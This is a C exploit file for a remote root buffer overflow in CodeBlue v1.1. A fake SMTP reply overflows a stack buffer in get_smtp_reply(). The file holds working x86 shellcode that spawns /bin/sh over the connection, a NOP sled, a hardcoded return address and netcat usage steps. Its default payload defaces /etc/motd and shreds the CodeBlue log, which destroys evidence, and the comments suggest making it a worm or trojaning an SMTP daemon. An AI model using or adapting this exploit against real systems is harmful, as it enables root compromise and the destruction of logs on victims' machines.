codeblue remote root

/*

• Demonstration linux-x86 remote root against codeblue v1.1 (from file header)
• Otherwise it's known as CodeBlue v4
• This is a rather trivial to exploit…
• From get_smtp_reply()
• "We'll loop infinately, receiving
• 1 byte at a time until we receive a carriage return
• or line-feed character, signifying the end of the output"
• The stack looks like
• int get_smtp_reply(int sd)
• {

•   char response[1024];
  

•   char reply_message[1024];  
  

• …
• I probably don't have to mention it, but it reads the response into response.
• …
• Also, since this is meant to increase security a little, why doesn't it
• filter non-alphanumeric chars? Also, since it is playing with untrusted
• data, why doesn't it drop uids, instead of insisting as running as root?
• if ((userid = getuid()) != 0) {

•   fprintf(stderr, "uid %d is invalid!\n", userid);
  

•   fprintf(stderr, "This program MUST be run as root\n");
  

•   exit(1);
  

• }
• Usage: gcc exp.c -o exp; ./exp | nc -l -p 25
• Now you could do (one another terminal)
• printf "GET /default.ida?NNNNNN HTTP/1.0\n\n" | nc remotehost 80
• and wait until codeblue runs.
• Granted, nc makes it remote, but why reinvent the wheel?
• Oh, and by the way, you'll most likely have to change the offset down there.
• Lots of improvements could (well, have) be done, such as a select(), read(),
• write(), so you can get a remote terminal… at the moment, all it'll do
• is make the id command display. Brute force is interesting, because you
• have to wait until it's run. I suspect, though I haven't tried, you could
• almost double the nop size by playing around with reply_message.
• If you had a sense of humour, you probably could turn this into a worm. This
• is one of the reason I don't really like automated response/attack software.
• Or you could just trojan/modify your existing smtp do to this whenever it
• recieves a HELO localhost…
• The interesting part of this is the bug in codeblue helped me win
• a wargame. We where given root an a box in a lan, and got to penertrate
• several others. Since the person running it was sick of being scanned by
• the various worms, he was running this…
• Now for the paranoia part, how many of those scans have you recieved where
• to check if you where running CodeBlue?
• laters,
• – Andrew Griffiths
  */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>

/* The shellcode beats doing a bindshell/connect code, since codeblue already is

• talking to our (supposed) smtp server, so all we have to do is redirect
• stdin/out/err to fd 5. (Assuming fd 5 is the smtp connection. It was on
• mine.)
  */

unsigned char sc[] =
/* dupsh basically, dup2(5, (0,1,2)) /
"\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x05"
"\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80"
/ Standard aleph1 shellcode */
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c"
"\x89\x76\x08\xb0\x0b\x87\xf3\x8d\x4b\x08"
"\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd\x80"
"\xe8\xde\xff\xff\xff/bin/sh";

int main()
{
unsigned char buf[3000];

    memset(buf, 0, 3000);

    memset(buf, 0x90, 967);
    strncpy(buf+967, sc, strlen(sc));
    fprintf(stderr, "buf: %s\n", buf);
    fprintf(stderr, "strlen(buf): %d\n", strlen(buf));
    buf[1036] = 0xd0;
    buf[1037] = 0xdf;
    buf[1038] = 0xff;
    buf[1039] = 0xbf;

#ifdef ICANMODIFYCCODEORMODIFYCOMPILETIMEFLAGS
strcpy(buf + 1040, " id");
#else
strcpy(buf + 1040, " echo warning codeblue has a remote root hole in it
>/etc/motd; shred -z codebluelog 2>/dev/null; rm -f codebluelog 2>/dev/null;
echo you sux. RTFC…");
#endif
printf("%s", buf);
}

–
www.tasmail.com